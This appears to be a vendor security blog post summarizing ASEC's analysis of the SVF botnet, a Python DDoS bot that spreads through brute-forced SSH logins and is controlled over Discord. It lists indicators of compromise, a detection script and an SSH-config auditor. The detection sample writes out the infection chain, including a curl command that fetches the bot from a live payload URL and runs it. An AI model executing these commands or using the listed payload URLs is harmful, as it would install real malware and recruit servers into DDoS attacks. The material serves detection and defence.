SVF Botnet Exploits SSH for Coordinated DDoS Attacks

AhnLab Security Intelligence Center (ASEC) has recently uncovered a wave of malicious activity involving the SVF Botnet, a lightweight yet capable Python-based malware used to launch DDoS attacks via compromised Linux SSH servers. The campaign highlights the continuing abuse of weak or default SSH credentials on internet-facing infrastructure.

Infection Tactics: Fast and Scripted

ASEC researchers observed attackers infiltrating Linux honeypots by brute-forcing SSH credentials. Once access is gained, the infection chain is executed in a single shell command:

  1. Create a Python virtual environment
  2. Install required packages: discord.py, requests, aiohttp, lxml
  3. Download the malicious payload from a public URL
  4. Execute it with parameters to register the infected server in a designated group

The malware then authenticates using a hardcoded Discord bot token and reports in via webhook, effectively using Discord as its command-and-control (C2) infrastructure.

SVF Bot Capabilities

SVF Bot supports multiple DDoS vectors, including:

  • Layer 7 (HTTP Flood)
  • Layer 4 (UDP Flood)

Operators can control attack intensity through configurable parameters like concurrency, thread count, and packet size. Notably, the bot integrates a proxy scraping and validation module to bolster attack anonymity:

  • Scrapes proxy lists from GitHub and other public sources
  • Validates proxies using real-time Google login attempts
  • Uses validated proxies to route HTTP floods

Commands like $load, $customhttp, and $customudp allow for highly targeted attacks. The malware’s modular design also supports remote updates, forced restarts, and recovery from crashes—making it both persistent and flexible.

Discord as a C2 Platform

By using Discord as its C2 hub, SVF Bot operators avoid the overhead of maintaining dedicated infrastructure. Discord’s widespread adoption and real-time communication features allow attackers to issue instructions, receive infection reports, and coordinate campaigns with ease.

This also complicates traditional detection and takedown efforts, as the botnet traffic blends in with legitimate communications on a mainstream platform.

Indicators of Compromise (IOCs)

Security teams should monitor for the following IOCs associated with SVF Bot activity:

  • MD5 Hash: cffe3fb6cb3e4b9b453c4147bdcd8c12
  • Download URL: http://146.59.239.144:55/
  • Payload URL: https://termbin.com/4ccx
  • Attacker IP: 185.254.75.44
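The IOCs above and the scripted infection chain described earlier are straightforward to turn into a host-side check. The following Python script is an added example written for this page, not code from ASEC or FastNetMon: it scans shell history, audit or flow records for the IOC IPs and URLs and for the three stages of the one-liner (venv creation, pip install of discord.py, download from termbin), and checks a file's MD5 against the reported hash. The log lines are constructed for the example; the regexes are assumptions about how the chain looks in practice and should be treated as a starting point, not a signature.

```python
import hashlib
import re
from dataclasses import dataclass

# IOCs as listed in the ASEC report (quoted on this page).
IOC_IPS = {"146.59.239.144", "185.254.75.44"}
IOC_URL_FRAGMENTS = {"146.59.239.144:55", "termbin.com/4ccx"}
IOC_MD5 = {"cffe3fb6cb3e4b9b453c4147bdcd8c12"}

# Stages of the scripted infection chain. The patterns are assumptions about
# how the commands appear in bash history or auditd execve records.
STAGE_PATTERNS = {
    "venv": re.compile(r"python3?\s+-m\s+venv\b"),
    "pip_discord": re.compile(r"pip3?\s+install\b.*\bdiscord(\.py)?\b"),
    "download": re.compile(r"\b(curl|wget)\b.*\b(termbin\.com|146\.59\.239\.144)\b"),
}


@dataclass
class Finding:
    line_no: int
    kind: str      # "ioc" or "stage"
    detail: str    # e.g. "ip:146.59.239.144" or "venv"
    line: str


def scan_lines(lines):
    """Return every IOC hit and infection-chain stage found in the input lines."""
    findings = []
    for n, line in enumerate(lines, 1):
        for ip in IOC_IPS:
            if ip in line:
                findings.append(Finding(n, "ioc", f"ip:{ip}", line))
        for frag in IOC_URL_FRAGMENTS:
            if frag in line:
                findings.append(Finding(n, "ioc", f"url:{frag}", line))
        for name, pat in STAGE_PATTERNS.items():
            if pat.search(line):
                findings.append(Finding(n, "stage", name, line))
    return findings


def infection_chain_present(findings):
    """True only when all three stages of the chain were seen."""
    seen = {f.detail for f in findings if f.kind == "stage"}
    return seen == set(STAGE_PATTERNS)


def md5_is_ioc(data: bytes) -> bool:
    """Compare a file's MD5 with the hash from the report."""
    return hashlib.md5(data).hexdigest() in IOC_MD5


# Constructed sample input: a victim's bash history plus two flow records.
# 203.0.113.10 is documentation address space, standing in for unrelated traffic.
SAMPLE_HISTORY = [
    "ls -la /var/www",
    "python3 -m venv /tmp/.svf && source /tmp/.svf/bin/activate",
    "pip install discord.py requests aiohttp lxml",
    "curl -s https://termbin.com/4ccx -o /tmp/.svf/bot.py",
    "python3 /tmp/.svf/bot.py --group eu1",
]
SAMPLE_FLOWS = [
    "2025-08-01T10:14:02Z src=10.0.0.5 dst=146.59.239.144 dport=55 proto=tcp",
    "2025-08-01T10:14:09Z src=10.0.0.5 dst=203.0.113.10 dport=443 proto=tcp",
]


if __name__ == "__main__":
    hits = scan_lines(SAMPLE_HISTORY + SAMPLE_FLOWS)
    for h in hits:
        print(f"line {h.line_no}: {h.kind} {h.detail}: {h.line}")
    print("full infection chain seen:", infection_chain_present(hits))
```

Run it against `~/.bash_history` of service accounts, auditd execve logs and exported flow data; a single stage hit (a venv on a web server, say) is noise, but all three stages plus a connection to one of the IOC addresses is a confirmed infection and the host should be isolated before the Discord C2 can push an update.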

Implications for Defenders

ASEC’s findings are a strong reminder that Linux servers remain a prime target for botnet operators, especially when basic hardening practices are ignored. The use of Python, open-source libraries, and Discord lowers the barrier for running large-scale attacks—even for less sophisticated threat actors.

FastNetMon’s Recommendations

1. Strengthen SSH Security

  • Disable password-based login (PasswordAuthentication no, and KbdInteractiveAuthentication no so keyboard-interactive does not remain a second password path) and use SSH keys
  • Where passwords cannot be disabled, enforce strong, unique credentials and disable direct root login (PermitRootLogin no)
  • Limit access via firewall to known IPs
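The settings above can be verified rather than assumed. The following Python auditor is an added example for this page, not part of the ASEC report or a FastNetMon tool: it parses either an sshd_config file or the effective configuration printed by `sshd -T`, fills in OpenSSH's defaults for absent keywords, and reports anything that still permits password or root login. The two configurations are constructed samples, and the MaxAuthTries limit of 3 is an assumed local policy, not an OpenSSH default.

```python
import re

# Keyword -> (value we want, OpenSSH default when the keyword is absent).
# Keys are lower-cased, matching what `sshd -T` prints.
EXPECTED = {
    "passwordauthentication": ("no", "yes"),
    "permitrootlogin": ("no", "prohibit-password"),
    "pubkeyauthentication": ("yes", "yes"),
    "permitemptypasswords": ("no", "no"),
    "kbdinteractiveauthentication": ("no", "yes"),
}
MAX_AUTH_TRIES = 3   # assumed local policy; OpenSSH's default is 6


def parse_sshd_config(text):
    """Parse sshd_config / `sshd -T` output into {keyword: value}.

    sshd uses the first value it sees for each keyword, so later duplicates are
    ignored. Parsing stops at the first Match block: settings inside it apply
    conditionally and must be audited per connection (see `sshd -T -C`).
    """
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.lower().startswith("match "):
            break
        m = re.match(r"^(\S+?)(?:\s*=\s*|\s+)(.+)$", line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        settings.setdefault(key, value)
    return settings


def audit(text):
    """Return a list of human-readable findings; an empty list means hardened."""
    s = parse_sshd_config(text)
    issues = []
    for key, (wanted, default) in EXPECTED.items():
        actual = s.get(key, default).lower()
        if actual != wanted:
            issues.append(f"{key} is '{actual}' (want '{wanted}')")
    tries = int(s.get("maxauthtries", "6"))
    if tries > MAX_AUTH_TRIES:
        issues.append(f"maxauthtries is {tries} (want <= {MAX_AUTH_TRIES})")
    return issues


# Constructed sample: a distribution-style config that leaves the brute-force
# path open. Everything not set here falls back to the OpenSSH default.
WEAK_CONFIG = """
Port 22
PermitRootLogin yes
PasswordAuthentication yes
MaxAuthTries 6
"""

# Constructed sample: the same server after applying the recommendations above.
HARDENED_CONFIG = """
Port 22
PermitRootLogin no
PasswordAuthentication no
KbdInteractiveAuthentication no
PermitEmptyPasswords no
PubkeyAuthentication yes
MaxAuthTries 3
"""


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"{name}: {audit(cfg) or 'OK'}")
```

Feed it `sshd -T` output rather than the file where possible, because that reflects included files and the daemon's own defaults; if the configuration uses Match blocks, run `sshd -T -C user=<user>,addr=<ip>,host=<host>` for the contexts that matter and audit each result separately, since a Match block can quietly re-enable PasswordAuthentication for a whole network.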

2. Keep Systems Patched

  • Update Python, SSH services, and OS packages regularly
  • Apply endpoint protection with active malware scanning

3. Monitor for Anomalous Network Behavior

  • Watch for outbound traffic to the IOCs listed above, and for connections to Discord's API or webhook endpoints from servers that have no legitimate reason to reach Discord
  • Use behavior-based detection systems to flag unusual proxy usage, bursts of outbound HTTP or UDP from a single host, or Discord-based C2 traffic

4. Deploy Network-Level DDoS Mitigation

  • Use systems like FastNetMon Advanced to detect traffic spikes, floods, and botnet behaviour in real-time
  • Implement automated blocking and rate-limiting for attack traffic

Conclusion

This incident demonstrates how attackers are adapting to modern ecosystems—using familiar tools like Discord, scripting languages like Python, and freely available proxies to build resilient and scalable botnet infrastructures. Thanks to the detailed analysis by AhnLab Security Intelligence Center, defenders have a clearer picture of the threat and the steps required to mitigate it.


About FastNetMon

FastNetMon is a leading solution for network security, offering advanced DDoS detection and mitigation. With real-time analytics and rapid response capabilities, FastNetMon helps organisations protect their infrastructure from evolving cyber threats.

For more information, visit https://fastnetmon.com
